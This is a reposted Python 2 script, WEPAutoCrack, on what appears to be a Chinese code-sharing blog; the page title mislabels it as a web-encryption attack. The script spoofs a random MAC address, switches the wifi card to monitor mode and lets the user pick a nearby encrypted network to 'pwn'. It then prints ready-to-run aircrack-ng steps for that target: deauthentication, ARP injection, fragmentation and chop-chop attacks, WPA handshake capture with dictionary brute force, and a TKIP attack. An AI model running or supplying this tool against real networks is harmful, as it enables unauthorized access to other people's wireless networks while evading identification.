autocrackweb攻击web加密的python脚本
2014-01-14 13:38
731 查看
#!/usr/bin/env python # # Copyright 2011-2012 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved. # # # --------- WEPAutoCrack ---------- # by zx2c4 # --------------------------------- # # This utility terminates disruptive daemons, scans for networks, # places your wifi card into monitor mode, switches to the right channel, # fakes a random MAC address, and builds a "choose your own adventure" # instruction sequence for the particular access point you choose to # crack, for use with aircrack-ng for cracking WEP passwords, and finally # resets your daemons once you've found a password. # # Be sure to look at the pwn() function. There are /etc/init.d/ commands in # there to shutdown and startup your system's networking services. Here you # will find how I have my gentoo box setup, but you'll likely need to # change it to suit your own needs. It should be trivial -- stopping and # starting NetworkManager, if you use that, or whatever your situation # is. There are two "CHANGE ME" blocks below. Find them. Edit them. # # greetz to gohu for iwlist parsing code at # https://bbs.archlinux.org/viewtopic.php?pid=737357 # import sys import subprocess import os import signal import time def pwn(interface, network): print "[+] Acquiring MAC address:", f = open("/sys/class/net/%s/address" % interface, "r") realMac = f.read().strip().upper() f.close() print realMac def restore(signum=None, frame=None): try: proc.terminate() except: pass os.system("reset") print "[+] Restoring wifi card" os.system("ifconfig %s down" % interface) os.system("macchanger -m %s %s" % (realMac, interface)) # BEGIN CHANGE OR REMOVE ME print "[+] Resetting module to work around driver bugs" os.system("rmmod iwldvm") os.system("rmmod iwlwifi") os.system("modprobe iwlwifi") time.sleep(2) # END CHANGE OR REMOVE ME os.system("iwconfig %s mode managed" % interface) os.system("ifconfig %s up" % interface) print "[+] Starting stopped services" # BEGIN CHANGE ME os.system("/etc/init.d/wpa_supplicant start") os.system("/etc/init.d/dhcpcd start") # END CHANGE ME sys.exit(0) signal.signal(signal.SIGTERM, restore) signal.signal(signal.SIGINT, restore) print "[+] Shutting down services" # BEGIN CHANGE ME os.system("/etc/init.d/wpa_supplicant stop") os.system("/etc/init.d/dhcpcd stop") # END CHANGE ME print "[+] Setting fake MAC address" os.system("ifconfig %s down" % interface) os.system("macchanger -r %s" % interface) f = open("/sys/class/net/%s/address" % interface, "r") mac = f.read().strip().upper() f.close() print "[+] Setting wireless card to channel %s" % network["Channel"] os.system("iwconfig %s mode managed" % interface) os.system("ifconfig %s up" % interface) os.system("iwconfig %s channel %s" % (interface, network["Channel"])) os.system("ifconfig %s down" % interface) os.system("iwconfig %s mode monitor" % interface) os.system("ifconfig %s up" % interface) os.system("iwconfig %s" % interface) if network["Encryption"].startswith("WEP"): instructions = """ === Capture IVs == airodump-ng -c CHANNEL --bssid BSSID -w output INTERFACE == Get Deauthetication Packets (Fake Authentication) == aireplay-ng -1 0 -e 'NAME' -a BSSID -h MAC INTERFACE OR aireplay-ng -1 6000 -o 1 -q 10 -e 'NAME' -a BSSID -h MAC INTERFACE * the latter is good for persnikitty stations == Request ARP Packets == aireplay-ng -3 -b BSSID -h MAC INTERFACE * if successful, skip the next three steps and move to analyze == Fragmentation Attack (if requesting ARPs didn't work - no users on network) == aireplay-ng -5 -b BSSID -h MAC INTERFACE * use this packet? yes * if successful, skip the next step and construct an arp packet == Chop-Chop Attach (if fragmentation fails) == aireplay-ng -4 -b BSSID -h MAC INTERFACE * use this packet? yes == Construct ARP Packet == packetforge-ng -0 -a BSSID -h MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-request * k source, l destination - change for persnikittiness = Inject Constructed ARP (if fragmentation or chop-chop) == aireplay-ng -2 -r arp-request INTERFACE * use this packet? yes == Analyze == aircrack-ng -z -b BSSID output*.cap """ elif network["Encryption"].startswith("WPA"): instructions = """ == Collect 4-way Authentication Handshake == airodump-ng -c CHANNEL --bssid BSSID -w psk INTERFACE == Deauthenticate Wireless Client == aireplay-ng -0 1 -a BSSID -c CLIENT INTERFACE == Brute Force == cat /usr/share/dict/* | aircrack-ng -w - -b BSSID psk*.cap """ if "(TKIP)" in network["Encryption"]: instructions += """ --------- Instead of brute forcing it, because this AP supports TKIP, there are possibilities of RC4 vulnerabilities. === Capture IVs == airodump-ng -c CHANNEL --bssid BSSID -w output INTERFACE === TKIP Relay === tkiptun-ng -h MAC -a BSSID -m 80 -n 100 INTERFACE == Analyze == aircrack-ng -z -b BSSID output*.cap """ else: instructions = "Wrong encryption type" instructions = instructions.replace("NAME", network["Name"]).replace("BSSID", network["Address"]).replace("MAC", mac).replace("INTERFACE", interface).replace("CHANNEL", network["Channel"]) proc = subprocess.Popen("less", stdin=subprocess.PIPE) proc.communicate(input=instructions) proc.wait() restore() def get_name(cell): return matching_line(cell, "ESSID:")[1:-1] def get_quality(cell): quality = matching_line(cell, "Quality=").split()[0].split('/') return str(int(round(float(quality[0]) / float(quality[1]) * 100))).rjust(3) + " %" def get_channel(cell): return matching_line(cell, "Channel:") def get_encryption(cell): enc = "" if matching_line(cell, "Encryption key:") == "off": enc = "Open" else: tkip = False for line in cell: if "Pairwise Ciphers (1) : TKIP" in line: tkip = True matching = match(line, "IE:") if matching != None: wpa = match(matching, "WPA") if wpa != None: enc = "WPA" else: wpa = match(matching, "IEEE 802.11i/WPA2") if wpa != None: enc = "WPA2" if enc == "": enc = "WEP" if tkip: enc += " (TKIP)" return enc def get_address(cell): return matching_line(cell, "Address: ") rules = {"Name":get_name, "Quality": get_quality, "Channel": get_channel, "Encryption": get_encryption, "Address": get_address } def sort_cells(cells): sortby = "Quality" reverse = True cells.sort(None, lambda el: el[sortby], reverse) columns = ["#", "Name", "Address", "Quality", "Channel", "Encryption"] def matching_line(lines, keyword): for line in lines: matching = match(line,keyword) if matching != None: return matching return None def match(line,keyword): line = line.lstrip() length = len(keyword) if line[:length] == keyword: return line[length:] else: return None def parse_cell(cell): parsed_cell = {} for key in rules: rule = rules[key] parsed_cell.update({ key: rule(cell) }) return parsed_cell def print_table(table): widths=map(max, map(lambda l:map(len, l), zip(*table))) justified_table = [] for line in table: justified_line = [] for i, el in enumerate(line): justified_line.append(el.ljust(widths[i] + 2)) justified_table.append(justified_line) for line in justified_table: for el in line: print el, print def print_cells(cells): table = [columns] counter = 1 for cell in cells: cell_properties=[] for column in columns: if column == '#': cell_properties.append(str(counter)) else: cell_properties.append(cell[column]) table.append(cell_properties) counter += 1 print_table(table) def main(): print "+------------------------+" print "+ +" print "+ WEPAutoCrack +" print "+ by zx2c4 +" print "+ +" print "+------------------------+" print if len(sys.argv) != 2: print "You must supply the wifi card name as an argument." return if os.getuid() != 0: print "You must be root." return while True: print "[+] Scanning..." proc = subprocess.Popen(["iwlist", sys.argv[1], "scanning"], stdout=subprocess.PIPE) cells=[[]] parsed_cells=[] for line in proc.stdout: cell_line = match(line, "Cell ") if cell_line != None: cells.append([]) line = cell_line[-27:] cells[-1].append(line.rstrip()) cells = cells[1:] for cell in cells: parsed_cells.append(parse_cell(cell)) sort_cells(parsed_cells) encrypted_cells = [] for cell in parsed_cells: if cell["Encryption"] != "Open": encrypted_cells.append(cell) if len(encrypted_cells) == 0: print "[-] Could not find any wireless networks." time.sleep(2) continue print_cells(encrypted_cells) print try: network = int(raw_input("Which network would you like to pwn? [1-%s] [0 to rescan, -1 to quit] " % len(encrypted_cells))) except: network = -1 if network > len(encrypted_cells) or network < 0: return if network == 0: continue pwn(sys.argv[1], encrypted_cells[network - 1]) return main()
相关文章推荐
- selenium_webdriver(python)调用js脚本
- Python写的组合密码生成脚本(针对TrueCrypt 加密磁盘密码搞忘了,用这个办法很有效)
- Python脚本加密,源码隐藏
- 【脚本语言系列】关于PythonWeb服务器Bottle,你需要知道的事
- Web端脚本攻击基础
- web 脚本攻击与防护
- 【脚本语言系列】关于PythonWeb服务器Flask,你需要知道的事
- Python脚本报错:selenium.common.exceptions.WebDriverException: Message: Service chromedriver.exe unexpect
- 对python源码进行编译,加密python脚本
- selenium_webdriver(python)的第一个脚本
- [python脚本]一个简单的web爬虫(1)
- 使用Python 2.7中pycurl模块编写探测多节点Web服务质量脚本
- python 基于web脚本编程--urlparse
- 用Python脚本定制自己的Web服务器 推荐
- python-webdriver 开始第一个脚本
- WEB中间件--tomcat爆破,burp和python脚本,getshell,war包
- python 一个简单防攻击脚本
- Python脚本08 —— 获取七牛服务器加密后的url
- Python 自动化脚本支持 Firefox 浏览器 官方Webdriver -- Geckodriver
- 【脚本语言系列】关于PythonWeb服务器apache+mod_wsgi,你需要知道的事